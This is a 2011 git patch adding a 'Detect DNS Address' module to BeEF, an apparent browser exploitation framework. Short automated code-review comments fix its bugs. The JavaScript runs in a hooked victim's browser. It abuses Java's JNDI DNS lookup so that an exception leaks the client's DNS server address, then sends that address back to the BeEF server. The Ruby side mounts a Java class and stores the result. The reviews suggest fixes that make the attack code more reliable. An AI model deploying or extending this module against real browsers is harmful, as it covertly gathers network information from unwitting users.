From a0ba7fa7fc3b9ce5cdf7b11826eaab9331aee61e Mon Sep 17 00:00:00 2001
From: "bcoles@gmail.com"
Date: Fri, 19 Aug 2011 06:33:21 +0000
Subject: [PATCH] Added module: Detect DNS Address Fixes issue 141
git-svn-id: https://beef.googlecode.com/svn/trunk@1211 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
modules/network/detect_dns_address/command.js | 70 ++++++++++++++++++
.../network/detect_dns_address/config.yaml | 27 +++++++
.../detect_dns_address/doNothing.class | Bin 0 -> 240 bytes
modules/network/detect_dns_address/module.rb | 46 ++++++++++++
4 files changed, 143 insertions(+)
create mode 100644 modules/network/detect_dns_address/command.js
create mode 100644 modules/network/detect_dns_address/config.yaml
create mode 100644 modules/network/detect_dns_address/doNothing.class
create mode 100644 modules/network/detect_dns_address/module.rb
diff --git a/modules/network/detect_dns_address/command.js b/modules/network/detect_dns_address/command.js
new file mode 100644
index 000000000..ab6c7849e
--- /dev/null
+++ b/modules/network/detect_dns_address/command.js
@@ -0,0 +1,70 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var command_timeout = "<%= @command_timeout %>";
+ var Packz = undefined;
+ var internal_counter = 0;
+
+ content = "";
+ $j('body').append(content);
+
+ function checkDns() {
+
+ var result = "";
+
+ try {
+ var env = new Packages.java.util.Hashtable();
+ env.put("java.naming.factory.initial", "com.sun.jndi.dns.DnsContextFactory");
+ env.put("java.naming.provider.url", "dns://");
+ var ctx = new Packages.javax.naming.directory.InitialDirContext(env);
+ var attrs = ctx.getAttributes("localhost",['*']);
+ } catch(e) {
+ var d="";
+ if (typeof e != "string") d=e.message; else d=e.toString();
+ var re=new RegExp("java.net.SocketPermission.([^:]*)");
+ var g=re.exec(d);
+ result = g[1];
+ }
+
+ return(result);
+ }
+
+ function waituntilok() {
+
+ try {
+ var output = checkDns();
+
+ if (output != null) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "dns_address="+output);
+ $j('#beefdns').detach();
+ return;
+ } else throw("command results haven't been returned yet");
+ } catch (e) {
+
+ internal_counter++;
+ if (internal_counter > command_timeout) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=time out');
+ $j('#beefdns').detach();
+ return;
+ }
+ setTimeout(function() {waituntilok()},1000);
+ }
+ }
+
+ waituntilok();
+
+});
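Review bot: `checkDns` returns the empty string when the `InitialDirContext` lookup raises nothing, and `if (output != null)` in `waituntilok` is true for `""`, so that case is reported to the server as a found address (`dns_address=` with no value) instead of being retried; `if (output)` keeps polling until the timeout. `result = g[1]` also assumes the `java.net.SocketPermission` regex matched; when `g` is null the TypeError is swallowed by the outer catch and becomes a silent retry, so `result = g ? g[1] : "";` makes that path explicit. `command_timeout` is interpolated as a string and compared with a number; `var command_timeout = parseInt("<%= @command_timeout %>", 10);` states the intent, and a non-numeric value would otherwise make `internal_counter > command_timeout` always false and the loop never end. As rendered here `content` is `""` and no `#beefdns` element is ever created, so both `detach()` calls look like no-ops and `Packages` would be undefined — if the applet markup was stripped from this view, confirm the committed file still carries it; `Packz` is unused.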
diff --git a/modules/network/detect_dns_address/config.yaml b/modules/network/detect_dns_address/config.yaml
new file mode 100644
index 000000000..fa0c3aac4
--- /dev/null
+++ b/modules/network/detect_dns_address/config.yaml
@@ -0,0 +1,27 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ detect_dns_address:
+ enable: true
+ category: "Network"
+ name: "Detect DNS Address"
+ description: "Detects the client's DNS address using Java."
+ authors: ["bcoles"]
+ target:
+ working: "FF"
+ user_notify: "IE"
+ not_working: ["S", "O", "C"]
diff --git a/modules/network/detect_dns_address/doNothing.class b/modules/network/detect_dns_address/doNothing.class
new file mode 100644
index 0000000000000000000000000000000000000000..7e67f8fe82cbfd3587cfbe75b2fd7e3ccfdd48e0
GIT binary patch
literal 240 zcmZ9Gy9&ZU5Jm6gX=03EXJKKd76ztC`VBrV&QQ~Zh6mD_v z?wP}|pYQ7pU;*ESj;;;QMvq`EWhSc?L7z;I1Y?sYg3#Z|Ooa6<7Udy|QznMe2<|?w z%ahnj#rz}>^XekA^ZXj!BM$~lg40sMK=B|did0m=x+#pI@dwn=zd9%^uZ1EVJ- literal 0 HcmV?d00001
diff --git a/modules/network/detect_dns_address/module.rb b/modules/network/detect_dns_address/module.rb
new file mode 100644
index 000000000..d9f78c971
--- /dev/null
+++ b/modules/network/detect_dns_address/module.rb
@@ -0,0 +1,46 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Uses the Packages.javax.naming package with DNS of "dns://"
+# Technique discovered by Stefano Di Paola from Minded Security Research Labs
+# Advisory: http://blog.mindedsecurity.com/2010/10/get-internal-network-information-with.html
+
+class Detect_dns_address < BeEF::Core::Command
+
+ def pre_send
+ # Mount the doNothing.class on /doNothing.class
+ # Unsure if there's something we can add here to check if the module was already mounted?
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_dns_address/doNothing.class','/doNothing','class')
+ end
+
+ def self.options
+ return [
+ {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}
+ ]
+ end
+
+ def callback
+ content = {}
+ content['dns_address'] = @datastore['dns_address'] if not @datastore['dns_address'].nil?
+ content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+ content['fail'] = 'could not detect dns address' if content.empty?
+ save content
+
+ # Unmount the class now, it's no longer required.
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/doNothing.class');
+
+ end
+
+end
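Review bot: `callback` unbinds `/doNothing.class` as soon as one browser answers, while `pre_send` binds it on every send at a single shared path, so with two hooked browsers running this command the first callback removes the asset while the second applet may still be fetching it, and a browser that never answers leaves it bound forever; unless `AssetHandler` reference-counts binds (not visible here), binding once and leaving the asset mounted is the safer shape, and the open question in the `pre_send` comment should become a `# TODO:` so it is tracked. `if not @datastore['dns_address'].nil?` reads better as `unless @datastore['dns_address'].nil?` (same for `fail`), the trailing `;` on the `unbind` line is redundant in Ruby, and `self.options` can drop the explicit `return`. A short class comment stating that `dns_address` is whatever string the hooked browser chose to send back, and that `callback` stores it unvalidated, would help readers of the datastore consumers.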